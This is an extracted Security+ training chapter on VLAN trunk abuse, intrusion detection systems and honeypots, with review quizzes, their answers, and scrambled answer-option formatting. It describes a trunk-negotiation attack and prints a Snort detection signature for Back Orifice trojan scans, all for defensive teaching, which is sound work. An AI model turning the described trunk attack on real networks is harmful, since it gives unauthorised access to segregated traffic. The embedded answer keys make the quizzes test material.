One way that trunks can be abused stems from the fact that the default behavior of some manufacturers switches is to automatically negotiate a trunk connection if the connecting device initiates it. Hackers can exploit this behavior by compromising a host on the network and then causing that host to negotiate a trunk connection with the switch. Once the trunk connection has been established, the switch forwards traffic for all VLANs across the link, giving the attacker access to potentially the entire network. Recall our example in which the Accounting and Marketing Departments are placed on separate VLANs and are connected with a router that filters traffic between the two. The attacker could use a host in the Marketing Department to create a trunk with the switch. As the switch begins to forward traffic down the illicit trunk link, the attacker can view and possibly modify traffic from Marketing, Accounting, or any other department using the switch. The protection provided by packet filtering on the router has been completely avoided because the trunk traffic does not pass through the router. Prevent illicit trunk connections by disabling auto-negotiation on all ports. Ports that are to carry trunks should be configured as trunks. All other ports should be configured not to be trunks. Trunk VLAN membership and pruning By default, trunk links are permitted to carry traffic from all VLANs on the network. This can lead to performance degradation of switches from carrying large amounts of traffic across trunks. In some cases, this traffic might not even be needed, as would be the case if a switch received traffic for the Accounting VLAN over a trunk but did not have any ports configured for that VLAN. This situation can be relieved by pruning (that is, removing) unneeded VLANs from the trunk. By removing the Accounting VLAN from the trunk, more bandwidth is made available to users connected to the switch. Some switches simplify this process by automatically pruning VLANs from a trunk if there are not any VLAN member ports on the other side of the trunk link. Relying on this default behavior to ensure that sensitive information is not carried to undesired areas of the network can be dangerous, however. For example, take a switch in a companys mechanic shop that is only used for the shop employees and has a trunk connection back to the office network. By default, only traffic destined for the auto shop is forwarded across the trunk, because there are no ports on the shops switch that are configured for other VLANs. However, the Accounting Departments information is still at risk. If an attacker could configure a port on the shops switch to be in the Accounting VLAN, then the Accounting VLAN would no longer be pruned from the trunk, and Accounting traffic would automatically be forwarded across the trunk to the mechanic shop. An attacker could take advantage of a poorly monitored area to physically compromise the network. In order to prevent such attacks, it is recommended that all trunk links be manually configured with the VLANs that are permitted to traverse them. Manual trunk pruning cannot be overridden the same way that automatic pruning is preempted. For more information on VLANs, go to:
http://www.cisco.com/univercd/cc/td/doc/cisintwk/ito_doc/lansw tch.htm.

Do it!
D-1:
Discussing VLANs and trunking

1 Major trunking protocols include which of the following? (Choose all that apply.)
A
IEEE 802.1q IEEE 802.3 Ciscos proprietary Inter-Switch Link (ISL) IEEE 802.10
B
C
2 VLANs are often coupled with a complimentary technology, called _________, which allows switches to share many VLANs over a single physical link. A B
C
spanning tree network address translation trunking pruning
3 When referring to VLANs, pruning refers to removing unneeded VLANs from the trunk. True or false?
True
4 VLANs are used throughout networks to segment, or separate, different hosts from each other on the network. True or false?
True
1129
Unit summary: Network security topologies

Topic A In this topic, you learned that security zones offer another dimension of network security. You learned about how the DMZ, intranet, and extranet fits within this model. You also considered how the security policy should be developed to include these security zones. In this topic, you examined the Network Address Translation (NAT) and Port Address Translation (PAT) technologies and their role in safeguarding the network. You learned how to configure a router with NAT and to filter Internet traffic for IP addresses and ports. In this topic, you learned how tunneling can be used to securely connect networks over public infrastructures. In this topic, you learned that Virtual LANs (VLANs) are used to divide a physical network into multiple network segments. This isolates sensitive traffic, as in the case of Accounting or Human Resources, from the rest of the corporate network. It also reduces the range of access should a hacker infiltrate the network.
Topic B
Topic C Topic D
Review questions
1 Which security zone should contain your Web, FTP, and mail servers? A Intranet
B
DMZ
C Extranet D VPN 2 Which security zone describes a configuration where the internal network of one company is available to another for B2B transactions?
Extranet
3 Which network service(s) allows internal addresses to be hidden from outside networks?
A B
NAT DMZ
C VLAN D VPN 4 PAT allows many hosts to share a single IP address by combining the IP address with a unique ________________.
TCP/UDP port number

5 Which networking technology enables a host to securely send its data through an untrusted or public network infrastructure? A Pruning
B
Tunneling
C Extranet D Perimeter network 6 Which of the following ports are necessary for allowing DNS traffic?
A
TCP 53
B TCP 80
C
UDP 53
D UDP 80 7 What are the benefits of a VLAN? A It hides the internal IP address from external networks.
B
It segments traffic on the internal network for increased security.
C It provides a secure tunnel from between two extranets. D It filters incoming traffic for selected IP and port addresses. 8 What are vulnerabilities of the VLAN?
A
A compromised host can negotiate a trunk connection with the switch, giving the attacker access to the entire network.
B A hosts broadcasts can be seen by other network segments. C A sniffer can be physically inserted into a specific targeted network segment.
D
Automatic pruning permits an attacker to reconfigure a switchs port to forward traffic to a different segment.
121
Unit 12 Intrusion detection

A Explain intrusion detection systems and
identify some of the major characteristics of intrusion detection products.

B Detail the differences between host-based
and network-based intrusion detection.

C Identify active detection and passive
detection features of both host- and network-based IDS products.

D Explain honeypots and how they are
employed to increase network security.

E Outline the proper response to an attack.
122
Topic A: Intrusion detection systems

Explanation Much like closed-circuit television systems employed in workplaces to monitor and increase security, intrusion detection systems (IDS) are monitoring devices on the network that help security administrators to identify attacks in progress, stop them, and to conduct forensic analysis after the attack is over. Intrusion detection is an important part of a commonly used security strategy known as defense in depth. Defense in depth is a multi-layered security approach that uses multiple techniques such as preventative technologies, security monitoring, and attack response to provide a robust security architecture. Intrusion detection provides monitoring of network resources to detect intrusions and attacks that were not stopped by the preventative techniques. For many reasons, it is impossible for firewalls to prevent all attacks. Some attacks occur from inside the network, and as such do not need to pass through the firewall to reach their victim hosts. Other attacks can occur from the outside, but use traffic permitted by the firewall. Intrusion detection systems are complimentary to blocking devices because they can monitor the attack after it crosses through the firewall, either as it passes across the wire, or as it is seen by the victim host. Similar to virus scanners, intrusion detection systems compare traffic to signature files that recognize specific known types of attack. These files are usually provided by the hardware or software vendor and are updated on a subscription basis. Additionally, intrusion detection systems can detect anomalies. Any pattern of traffic that deviates from the expected sequence of packets during a session might be suspect and cause a network manager to be notified. By employing this technique, even attacks that are too new to appear in the signature file might be flagged for manual analysis by an administrator who might be able to stop an attack or mitigate its effect. Intrusion detection tools also assist in protecting organizations by expanding the options available to manage the risk from threats and vulnerabilities. Since the modus operandi of intrusion detection systems is to monitor activity, either on the network segment or on the host, they gather useful information that can not only be used to detect an attacker, but also to identify and stop him, support investigations to understand the attackers strategy, and to prevent the strategy from being successful in the future. Intrusion detection systems are a very powerful tool in a security administrators tool kit.
Negatives and positives

One of the most important goals of IDS is that they must correctly identify intrusions and attacks. False positives and false negatives refer to situations in which the intrusion detection systems do not correctly categorize activities as being attacks or as being benign. There are really only two possible decisions for each activity that IDS observe: the activity can be identified as an attack, or just the opposite, it can be identified as benign.
Intrusion detection
123
Because the IDS can be either correct or incorrect in their determination about the type of activity, there are four possibilities to describe the correctness of IDS determinations: True positives Occur when the IDS correctly identifies undesirable traffic. True negatives Occur when the IDS correctly identifies normal traffic. False positives Occur when the IDS incorrectly identifies normal traffic as an attack. False negatives Occur when the IDS incorrectly identifies an attack as normal traffic. False negatives False negatives imply that the IDS failed to detect an attack, a very undesirable situation. False negatives typically occur when the pattern of traffic is not identified in the signature database, such as with a new attack. False negatives can also occur with network-based IDS when the sensor is not able to analyze passing traffic fast enough. For example, if a network-based IDS (NIDS) capable of processing 40 Mb/sec worth of traffic is placed on a 100 Mb/sec network segment, the NIDS will begin to miss packets when the volume of traffic on the segment surpasses its 40 Mb/sec capability. IDS is not infallible, and false negatives do indeed occur on a regular basis. The problem of false negatives can be dealt with in two ways. First, a combination of network-based and host-based IDS can be used to obtain more even coverage. The combination also helps to gather more data on attacks that can help administrators analyze the attack more effectively. Second, NIDS can be deployed at multiple strategic locations in the network. That way, an attack missed by one NIDS, on the server farms network segment, for example, might be caught by the NIDS just inside the firewall. False positives False positives happen when the IDS mistakenly reports certain benign activity as malicious. Best-case false positives require human intervention to diagnose the event. Worst-case false positives can cause the legitimate traffic to be blocked by a router or firewall. Obviously, false positives are undesirable because they require the time of a security administratoran expensive commodityto analyze and sort out the problem. All IDS products on the market today are subject to false positives. Especially just after deployment, IDS can be expected to produce a relatively high volume of false positives, which are reduced over time using a process called tuning. The tuning process allows the administrator to instruct sensors not to alarm, based on parameters such as signature type, and source or destination IP address. One common example is a network management program that pings devices to ensure that they are functioning. This behavior resembles a reconnaissance technique called a ping sweep, which attackers can use to determine which IP addresses are up and available to attack. It also triggers an alarm from an NIDS. Although ping sweeps can indicate malicious activity, the alarm is a false positive when the ping sweep is conducted by an authorized host, the network management system. To prevent the NIDS sensor from alarming on a false positive, it can be configured not to alarm on ping sweeps from the network management systems IP address. Tuning is an essential step in any IDS deployment.
124
Do it!
A-1:
Detecting intrusion

1 What is defense in depth?
This is a multilayered security approach that uses multiple security techniques such as preventative technologies, security monitoring, and attack response.
2 Intrusion detection provides monitoring of network resources to detect intrusions and attacks that were not stopped by the preventative techniques. True or false?
True
3 Intrusion detection systems identify attacks by comparing traffic to signature files with known types of attack and detecting anomalies. True or false?
True
4 False negatives happen when the IDS mistakenly reports certain benign activity as malicious. True or false?
False. These are false positives.
5 What measures can you take to reduce false negatives?

A
Combine network-based and host-based IDS. Tune the IDS to accept specific signature types or source or destination IP addresses. Deploy NIDS at multiple strategic locations in the network. Reduce the traffic speed.
B
C
Intrusion detection
125
Topic B: Network-based and host-based IDS

# 3.4 Objective Differentiate the following types of intrusion detection, be able to explain the concepts of each type, and understand the implementation and configuration of each kind of intrusion detection system Network Based Host Based
Types of IDS
Explanation The two types of intrusion detection systems on the market today are host-based and network-based. The essential difference between them is the scope of activity that they monitor and analyze to detect intrusions. Network-based IDS (NIDS) monitor network traffic while host-based IDS (HIDS) monitor activity on a particular host machine.
Network-based IDS
NIDS sensors are dedicated network devices or servers that monitor traffic on one or more network segments. The sensors usually have two network connections, one that operates in promiscuous mode to sniff passing traffic, and an administrative NIC that is used to send data such as alerts to a centralized management system. The configuration is shown in Exhibit 12-1.
Exhibit 12-1: NIDS monitoring and management interfaces Because NIDS analyze all passing traffic, they can be used to protect an entire network segmentor the entire organizationdepending on their placement within the network. The primary constraint for NIDS is the occasional inability to keep up with the pace of network traffic.
126
CompTIA Security+ Certification NIDS architecture One of the key questions that arise in deploying NIDS is, where in the network do sensors belong? Because it is not cost-effective or even manageable to deploy sensors on all network segments, careful consideration needs to be given as to where they are deployed. To determine how to deploy IDS, one needs only answer the question: What do I most need to protect? The decision of where to deploy IDS should be driven by the value your organization places on its information assets. This is because NIDS sensors are placed strategically in the network to defend assets that are considered the most valuable where they will offer the most protection. Typical locations for IDS sensors include: Just inside the firewall On the DMZ On any subnets containing mission-critical servers Just inside the firewall is a common location for IDS because it is the bottleneck through which all inbound and outbound traffic must pass. In this location, sensors are able to inspect every packet coming into or out of the organizations network, provided there are no other avenues such as dial-up connections or extranet connections that the attacker can use. The DMZ is another good location for IDS, because the publicly reachable hosts located there are frequently attacked from the Internet. If a good security policy is implemented (which likely disallows connectivity from the Internet directly to the inside network), then the DMZ is the attackers first point of entry into the network. Once a DMZ host has been compromised, the attacker attempts to penetrate the trusted network. IDS in this location can help to identify and stop intruders before they are able to do so. Finally, consider placing the sensor on any subnets containing mission-critical application servers, such as those performing financial, logistical, and human resources functions. By placing the sensor on these segments, the organization can defend its servers from attacks originating from inside the network. NIDS signature types Signature-based IDS look for patterns in packet payloads that indicate a possible attack. When the sensor finds a packet payload that matches the string pattern in its sensor, it identifies the packet as an attack and alerts the administrator. An IDS based on another signature type, port signature, simply watches for connection attempts to a known or frequently attacked port. These could be ports used by Trojan horse programs, or other malware, or they could simply be well-known ports in a packet destined for part of the network where the corresponding service should not exist. For example, if telnet (TCP port 23) is not used on the DMZ, then a telnet packet destined for the DMZ could be marked as suspicious. Finally, IDS based on header signatures watch for dangerous or illogical combinations in packet headers. One well-known example is a packet generated by the attack tool WinNuke. WinNuke creates packets destined for a NetBIOS port, with the Urgent pointer, or Out Of Band pointer set. This packet crashes older Windows systems. A NIDS based on header signatures identifies this type of packet as an attack, because the attack is contained in the packets header and not in the payload.
Intrusion detection
127
Because new vulnerabilities are constantly identified by the security community, signature-based intrusion detection systems must be kept up to date with the latest signatures, much the same way virus definitions in virus scanning software need to be kept current with the latest developments in the security arena. The time between when the new attack first becomes available and when it becomes known to the security community (which then produces a signature for the attack) represents a vulnerability of signature-based IDS, because attackers are free to use the new exploit without fear of detection during that time period. IDS vendors do commonly provide signature update services, and e-mail customers when new signatures become available. To minimize vulnerability, it is critical that IDS be loaded with the latest signatures. Network IDS reactions As has been previously noted, network-based IDS with active monitoring capabilities are able to react when they detect an attack in progress. Typical reaction types include: TCP resets IP session logging Shunning or blocking Most active capabilities are configurable on a per-signature basis, meaning that the sensor can perform IP session logging for some attacks, blocking for others, or simply sound the alarm, depending on the organizations requirements. Note: Extreme care should be used with active sensor capabilities to prevent interference with legitimate traffic. In practice, active capabilities are infrequently implemented because of the risk that they could be used to deny service of legitimate user traffic. When these capabilities are deployed, it is done after the sensors have been carefully tuned and requires ongoing monitoring. TCP resets TCP resets operate by sending a TCP reset packet (which terminates TCP sessions) to the victim host, spoofing the IP addresses of the attacker. Resets are sent from the sensors monitoring or sniffing interface. Although TCP resets can terminate an attack in progress, they cannot stop the initial packet from reaching the victim. In some cases, a single packet is all that is required to crash or compromise the victim host. Further, in order to successfully spoof the identity of the attacking host (remember that the victim does not know that it is under attack and sees the TCP session as being like any other session that should be protected from session hijacking), the sensor must guess the correct TCP session number so that the victim will accept the reset and end the session. IP session logging With IP session logging, the sensor records traffic passing between the attacker and the victim. (Note that these records can be very useful for analyzing the attack and preventing it in the future.) The limitation of logging is that only the trigger and the subsequent packets are logged, so any preceding packets are lost. IP session logging can also impact sensor performance and quickly consume large amounts of disk space.
128
CompTIA Security+ Certification Shunning In shunning (also known as IDS blocking), the sensor connects to the firewall or a packet-filtering router from its management interface and configures filtering rules that block packets from the attacker. Proper authentication needs to be arranged to ensure that the sensor can securely log into the firewall or router. Shunning is usually a temporary measure (the rules are typically left in for a period of minutes or hours) that buy administrators time to respond. Shunning is not typically a permanent countermeasure. It is important to keep in mind that if the attacker has used a spoofed source address in his attack, then the IDS sensor will actually block someone other than the attacker (the legitimate owner of the spoofed IP address). Note: Shunning takes place after a triggering packet has been noted by the sensor. When it reaches the victim host, it can potentially inflict damage before the filtering rule is in place.
Do it!
B-1:
Discussing network-based IDS

1 Network-based IDS (NIDS) monitor traffic on a host machine. True or false?
False. NIDS monitor traffic on the network.
2 TCP resets operate by spoofing the IP addresses of the attacker and sending a TCP reset packet to the victim host. True or false?
True
3 With IP session logging, the sensor records traffic passing between the attacker and the victim. True or false?
True
4 The DMZ is a good location for IDS because the publicly reachable hosts located there will be under constant attack from the Internet. True or false?
True
5 In shunning, the sensor connects to the firewall or a packet-filtering router from what interface?
A
Management IDS sensor Desktop Host sensor
B C D
6 A NIDS that watches for connection attempts to a known or frequently attacked port uses _____________ detection.
port signature
Intrusion detection
129
Host-based IDS
Explanation Host-based IDS are used to protect a critical network server containing sensitive information. Host-based IDS agents (the actual HIDS software) only protect the host on which they are installed. Like any application, host-based IDS agents use resources on the host server (disk space, memory, and processor time), which can have some impact on system performance. HIDS can detect intrusions by analyzing the logs of operating systems and applications, resource utilization, and other system activity. Host-based IDS are primarily used to protect only critical servers, because it is not practical or costeffective to install them on all systems. HIDS method of operation Host-based intrusion detection products have a wealth of methods that can be employed to detect and stop intrusions. A list of the more common techniques employed by modern HIDS products includes: Auditing of logs, including system logs, event logs, security logs, and syslog (for Unix hosts). Monitoring of file checksums to identify changes. Elementary network-based signature techniques including port activity. Intercepting and evaluating requests by applications for system resources before they are processed. Monitoring of system processes for suspicious activity. Log files Most HIDS products audit log files by monitoring changes to them. If a log file is changed, the HIDS product checks the new entry to see if it matches any of the HIDS attack signature patterns. If the log entry does match the attack signature, the HIDS alert administrators. Note that because logs reflect past events, file auditing cannot stop the action that sets off the alarm from taking place. File checksums File checksums are similar to log file audits in that they can detect past activity. Hashes are typically created only for critical system files that should change infrequently if at all. If frequently changing files are included in the file audit, the administrator will need to tune the IDS so that it does not generate alerts every time these files are changed. The tuning process can be used by administrators to learn which files they should expect to change and which should remain static. File checksum systems such as Tripwire can also be employed when full-fledged HIDS products are not available or practical for a particular environment. (Tripwire scans file systems and creates hashes of critical system files. The hashes are saved, and the program is periodically rerun to validate that the hash value for each file has not changed.) By employing such a product, administrators can be notified when an intrusion has occurred (because the attacker will almost certainly upload tools or change permissions to make access to the machine easier), and can be certain which files have been tampered with by the intruder. The modified files can be easily identified and refreshed from backups, eliminating the need to completely rebuild the server.

Network-based techniques Network-based techniques can also be added to host-based intrusion detection software products. In this situation, the IDS product simply monitors the packets entering and departing the hosts NIC for signs of malicious activity. This solution is designed only to protect the host in question, not to act as a full-featured NIDS product that can protect the entire network segment. Rather than sniff all network traffic, the IDS product simply intercepts received packets before they are passed to the hosts operating system. HIDS products that incorporate NIDS functionality rarely have the same sophisticated attack signatures that dedicated NIDS products have. Most often, HIDS products only provide rudimentary network-based protections. Intercepting requests and monitoring the system Perhaps most significantly, modern HIDS products proactively protect the monitored host by intercepting requests to the operating system for system resources before they are processed. This type of HIDS product integrates with the operating system and is able to validate software calls made into the OS and kernel. Validation of the software calls is accomplished by both generic rules about what processes might have access to resources, and by matching calls to system resources with predefined models (signatures) which identify malicious activity. This feature has far-reaching implications for the security of the protected host. By intercepting calls to the OS before they are processed, HIDS can use active monitoring techniques to preempt attacks before they are executed. Because the operating system controls all system resources, this type of NIDS can: Prevent files from being modified, deleted, and in some cases being viewed. Allow access to data files only to a predefined set of processes. Protect system registry settings from modification. Prevent critical system services (such as a Web server) from being stopped, modified, or deleted. Protect settings for users from being modified or deleted, including preventing escalation of the rights. Stop exploitation of application vulnerabilities that might allow remote access to the system or deny access (DoS) to the system. Prevent the protected servers application from making unauthorized changes to the system.
Intrusion detection HIDS software
1211
Host-based IDS are deployed by installing agent software on the system to be protected. There are two main types of host-based intrusion detection software: host wrappers (some of which are thought of as desktop or personal firewalls) and agent-based software. Either approach is much more effective in detecting trusted-insider attacks (so-called anomalous activity) than is network-based ID, and both are relatively effective for detecting attacks from the outside. However, host wrappers do not have the ability to provide the in-depth, active monitoring measures that agent-based HIDS products have. Host wrappers tend to be inexpensive and deployable on all machines in the enterprise, while agent-based applications are more suited for single purpose servers. Examples of host wrappers are Internet Security Systems (formerly Network ICE and then Black ICE Defender ) BlackICE PC Protection and BlackICE Server Protection (www.iss.net). An example of a full-fledged agent HIDS product is McAfees Entercept host-based IDS product (mcafee.com/us/products/mcafee/host_ips/category.htm). These products have evaluation versions that can be downloaded and used on a trial basis. HIDS active monitoring capabilities When an attack is flagged, host-based IDS have a similar menu of options to that of network-based IDS. However, given that the HIDS have access to the hosts operating system, the HIDS have more power to end attacks with more certainty. List of options commonly used by HIDS agents include: Log the event Alert the administrator Terminate the user login Disable the user account Logs of an offending event that trigger a response from an agent are obviously a useful thing for administrators to review in performing a post mortem on an attack. Administrators can be alerted through an IDS management console (an application responsible for receiving alarms from IDS agents), by sending an e-mail, or by sending SNMP traps to a network management system. The ability for host-based intrusion detection systems to stop attacks in progress by forcing the offending account to log off or disabling it altogether is what makes hostbased IDS an effective security tool and one that compliments network-based IDS and firewalls. Those HIDS products with a high degree of OS integration and which can intercept requests for system resources can go a step further by preventing access to memory, processor time, and disk space altogether.

Advantages of host-based IDS Host-based and network-based IDS products are complimentary solutions that should be deployed together to provide defense in depth for network assets. Network-based solutions generally provide an early warning system for attacks, often identifying attacker reconnaissance activities. Host-based intrusion detection solutions have the ability to actually stop compromises while they are in progress. Some of the benefits of HIDS include: Host-based systems have the ability to verify success or failure of an attack by reviewing extensive HIDS log entries. Network-based IDS products can verify that an attack was attempted, but cannot always provide evidence as to whether or not the attack was successful. Host-based solutions monitor user and system activities such as file access, changes to permissions and user accounts, software installation, and use of networked resources. This provides detailed information that can be used in a forensic analysis of the attack. Host-based solutions have the ability to protect against attacks that are not network based, such as when an attacker attempts to gain direct physical access to the host from the keyboard. Host-based IDS solutions do not rely on any particular network infrastructure, and so are not limited by switched infrastructures, which can make networkbased IDS implementations difficult. Host-based IDS solutions are able to react very quickly to intrusions, by either preventing access to system resources or by identifying a breach immediately after it has occurred. Because host-based IDS agents are installed on the protected server itself, it requires no additional hardware to deploy, and does not require any changes to the network infrastructure.
Intrusion detection Do it!
1213
B-2:
Discussing host-based IDS

1 What types of activity do host-based IDS (or HIDS) monitor?
HIDS monitor log files, file checksums, port activity, application requests, and system processes for suspicious activity.
2 In protecting applications, the host sensor agent monitors which areas of application activity? (Choose all that apply.) A B C D E
F
Program files Data file Registry settings Services Users All of the above
3 HIDS can stop an attack in progress by forcing the offending account to log off or disabling it altogether. True or false?
True
4 Some benefits of HIDS include: A B C D E

F
Can verify success or failure of an attack by reviewing log entries. Monitor user and system activities. Protect against attacks that are not network based, such as physical attacks. Are not limited by switched infrastructures. React quickly to intrusions. All of the above.
Topic C: Active and passive detection

# 3.4 Objective Differentiate the following types of intrusion detection, be able to explain the concepts of each type, and understand the implementation and configuration of each kind of intrusion detection system Network Based Active Detection Passive Detection Host Based Active Detection Passive Detection
Types of intrusion detection systems

Explanation One way that intrusion detection systems can be categorized is based on their ability to take action when they detect suspicious activity. Passive systems log security events, alert administrators when an attack occurs, and record the offending traffic for analysis, but do not take any preventive action to stop the attack. Active systems have all the logging, alerting, and recording features of passive IDS, with the additional ability to take action against the offending traffic. A couple of options are available for an active system. Active IDS that are able to interoperate with routers and firewalls can upload access control lists to them in order to block the offending traffic at the network edge, as shown in Exhibit 12-2.
Exhibit 12-2: NIDS reconfiguration of a router to block attacking packets
Intrusion detection
1215
This feature is often referred to as IDS shunning or blocking. Another option is for the active IDS system to send a TCP reset, using the spoofed IP address of the attacker, to the victim host, causing the attacking session to be killed. The TCP reset is illustrated in Exhibit 12-3. Although active systems might seem far superior because of their ability to block undesirable traffic, those features must be used with extreme care. Because IDS has not matured to a point where false positives are very low, enabling shunning features on IDS can cause legitimate traffic to be inadvertently blocked. Worse, attackers can use the IDS to create denial-of-service attacks where legitimate users IP addresses or subnets are blocked from entering the network. Active IDS features tend to be used only in networks where the IDS administrator has carefully tuned the sensors behavior to minimize the number of false positive alarms.
Exhibit 12-3: TCP resets used to stop attacking sessions
Anomaly-based and signature-based IDS

A system has been developed to classify intrusion detection systems based on how they detect malicious activity. There are two major categories: signature detection (also known as misuse detection), and anomaly detection. Signature detections Signature detection is achieved by creating models of attacks, also called signatures. As events are monitored, they are compared to a model to determine whether the event qualifies as an intrusion. For example, most NIDS use signatures to identify attacks. The signature of a given attack could be a string of characters that appear in the payload of a packet that is part of the attack. If you used a protocol analyzer such as SnifferPro to view a Back Orifice port probe (which an attacker might execute to determine if Back Orifice is running on a potential victim host), you would see the following data in the packets payload:
CE 63 D1 D2 16 E7 13 CF 38 A5 A5 86 B2 75 4B 99 c......8....uK. AA 32 58
.2X

Now that you know what the probe looks like, a signature can be created for a NIDS. The following signature definition was created from the above sniffer trace for use with an open source IDS program called Snort:
alert UDP $EXTERNAL any -> $INTERNAL 31337 (msg: IDS397/ trojan_trojan-BackOrifice1-scan; content: | ce63 d1d2 16e7 13cf 38a5 a586|;)
The relevant part of the signature definition, the content field, appears in bold type. Notice that it matches the sniffer trace. Snort examines every packet that enters its monitoring NIC and compares the data payload against this signature. If there is an exact match, then Snort alerts the administrator that it has identified an attack using a Back Orifice port scanner. It is important that only attacks and no benign traffic should match the signatures, otherwise false alarms are generated. The signature detection method is good at detecting known attacks, but requires the sensors database be maintained with current signatures; otherwise, new attacks are not detected. A well-crafted signature nearly always detects the attack it represents, but other packets might also match the signature and generate false alarms. When false positives occur, IDS administrators tune the sensor by carefully determining the cause of the alarm. If the alarm is irrelevant (as it would be if it represented a Windows exploit when the network has only Unix hosts), then the administrator can safely configure the sensor to ignore the signature. If the alarm is required, then the alarms context would be modified to prevent a repeat occurrence. Most signature systems are easily customizable, and knowledgeable users can create their own signatures. One problem with signature-based detection techniques is the large number of signatures required to effectively detect misuse. Since a separate signature is needed for each type of attack, a complete database of signatures can contain several hundred entries. The more signatures that each passing packet must be compared against, the slower the NIDS sensor operates. If a sensor operates too slowly, it misses packets and potentially misses attacks as well. Despite this challenge, signature-based intrusion detection is quite popular and works well in practice when configured correctly and monitored frequently. Anomaly detections Anomaly detection takes the opposite position from signature detection. Rather than operate from signatures that define misuse or attacks on the network, anomaly detection creates a model of normal use and looks for activity that does not conform to that model. The difficulty in anomaly detection is in creating the model of normal network activity (or use model). One method of creating the use model selects key statistics about network traffic to recognize normal activity. Unfortunately, too much statistical variation makes models inaccurate, and events classified as anomalies might not always be malicious. For example, a companys employees might have the habit of returning to their desks and checking their e-mail immediately following a monthly departmental meeting. The resulting spike in activity is not normal for that time of the day or week, so the anomalybased IDS might label it as a denial-of-service attempt against the mail server.
Intrusion detection
1217
Another problem with anomaly-based detection is the inability to create a model on a completely normal network. Anomaly detection systems must create a normal use model by monitoring traffic on the specific network that they will defend. However, the network might already contain malicious activity, especially if it has an Internet connection. Any use model created from such a network would implicitly ignore such preexisting malicious activity, viewing it as normal. Anomaly detection systems arent as popular as signature detection systems because of high false alarm rates created by inaccurate models of normal use.
Intrusion detection products

The following table provides a listing of some of the better-known IDS products:
Company Aladdin Knowledge Systems Comments eSafe family provides content security against known and unknown security threats. Offers Cisco Guard 5650 and Cisco Traffic Anomaly Detector 5600. These products are aimed to deal with DDoS attacks. eTrust intrusion detection product is part of the eTrust suite.
ealaddin.com
Cisco Systems, Inc.
cisco.com
Computer Associates Intl.
ca.com
Cylant Technology
cylant.com
Enterasys Networks Inc.
CylantSecure product purports to protect against even unknown types of attacks by preventing any anomalous server activity. Dragon family includes network monitors, host-based IDS, and central console. A major player in the market, provides integrated host- and networkbased IDS. Offers SecureNet family of IDS products.
enterasys.com
Internet Security Systems Inc.
iss.net
Intrusion.com Inc.
intrusion.com
NFR Security
nfr.com
Snort
Sentivist -IDS monitors packet fragments and reassembled packets, and provides customization capabilities. The home of the well-known open source IDS, Snort.
snort.org
Symantec Host IDS www.symantec.com Sourcefire, Inc. Symantec Host IDS provides prevention, real-time monitoring and detection of security breaches. Open source network intrusion detection software, including Intrusion Sensor and Snort. Based on the former freeware tool, product detects breaches by monitoring files for unauthorized changes.
sourcefire.com
TripWire Inc.
tripwire.com

Do it!
C-1:
Discussing active and passive detection

1 One way that intrusion detection systems can be categorized is based on their ability to take action when they detect suspicious activity. Passive systems do not take any action to stop or prevent the activity, which could potentially be an attack. True or false?
True
2 A system has been developed to classify intrusion detection systems based on how they detect malicious activity. What are the major categories?
A B
Signature detection Anomaly detection Abnormal detection Intrusion penetration All of the above
C D E
3 Which type of IDS can only take logging and alerting types of actions when an attack is identified? A B
C
HIDS Active system Passive system NIDS
4 What is a method of detecting intrusion in which the IDS analyze the information they gather and compare it to a database of known attacks? A B C
D
IDS Host wrappers NIDS Signature detection
5 Which IDS method is operating system-dependent?

A
Host-based Log-based Network-based Event-based
B C D
Intrusion detection 6 Which method of IDS is best suited for detecting Trojan horses such as BackOrifice? A B
C
1219
Host-based Anomaly-based Signature-based Network-based
7 Which method of IDS is capable of real-time detection?

A
Host-based Log-based Network-based Event-based
B C D
Topic D: Honeypots
# 3.4 Objective Differentiate the following types of intrusion detection, be able to explain the concepts of each type, and understand the implementation and configuration of each kind of intrusion detection system Honey Pots
Goals of deploying honeypots

Explanation In the broadest sense, honeypots are security resources designed with the intent that they will be probed, attacked, or compromised. They are usually programs (although one hardware honeypot product, Smoke Detector, does exist) that simulate one or more unsecured network services. Honeypots are designed to deceive attackers into thinking that the honeypot is a normal host, often with low security, in order to bait them into penetrating it. When the attacker compromises the virtual host provided by the honeypot, all of their actions are logged and recorded, including all keystrokes, changes to the virtual hosts configuration, and uploads of attack tools. Typically, the goal of deploying honeypots is in gathering information on hacker techniques, methodology, and tools. Honeypots, then, are usually deployed in two major cases: first, to conduct academic or basic research into hacker methods, and second, to detect attackers inside the organizations network perimeter. Honeypots do not have any capabilities to prevent intrusions; quite the opposite, they are designed to attract attackers just as bees are attracted to honey. Honeypots do have value in reacting to intrusions, because they make the forensic process easy for investigators. Rather than wading through gigabytes of system data in order to find the evidence they need, investigators are directly provided the data on the intruders activities by the honeypot software. Although still infrequently encountered in enterprises, honeypots are growing in popularity as a mechanism for increasing security in networks. As can be seen in the following tables, a number of commercial and open source honeypot products have been created. Most organizations have little interest in deploying honeypots for the sake of research, as that research really does not add value to their business operations. (Research honeypots are usually deployed by universities, governments, or research organizations.) When businesses deploy honeypots, the goal is usually to obtain early warning that a malicious hacker has access to the network.
Intrusion detection
Commercial honeypot Decoy Server symantec.com Specter specter.com Comments
1221
Decoy Server provides complete operating systems for attackers to interact with, and has good monitoring, data collection and notification capabilities. An easy-to-use commercial honeypot designed to run on Windows, Specter can emulate several different operating systems, monitor every ICMP packet, TCP connection and UDP datagram, and has a variety of configuration and notification features. A commercial honeypot appliance with extensive detection and emulation capabilities.
PacketDecoy palisadesys.com
Free honeypot BackOfficer nfr.com/resource/backO fficer.php Deception Toolkit all.net/dtk/dtk.html Honeyd www.honeyd.org
Comments A free Windows-based honeypot, BackOfficer is extremely easy to use and runs on any Windows platform; a good beginners honeypot. A collection of Perl scripts and C source code that emulate a variety of listening services, DTKs primary purpose is to deceive human attackers. Introduced a variety of new concepts, including the ability to monitor millions of unused IPs, IP stack spoofing, and to simulate hundreds of operating systems at the same time. Not a program, but an entire network of systems designed to be compromised. An open source solution that allows you to run multiple operating systems (and honeypots) at the same time, UML also has honeypot functionality, including the ability to capture the attackers keystrokes from kernel space; UML allows you to create an entire honeynet on a single computer.
Honeynets www.honeynet.org User Mode Linux user-modelinux.sourceforge.net
Honeypot deployment options

A honeypot can be deployed in a variety of locations in the network, depending on the goal of the person deploying it. For research purposes, directly connecting a honeypot to the Internet allows the owner to collect the most data, because hosts exposed to the Internet are attacked frequently and repeatedly. However, such a deployment offers little help in securing an organizations network. When the goal of deploying the honeypot is to add security to the network, the honeypot should be deployed inside the network where it can serve to detect attackers and alert security administrators to their presence. In this case, the honeypot should be placed where it will most likely receive the attention of an attacker, such as on a server farm or on a DMZ.
1222 CompTIA Security+ Certification Honeypot design

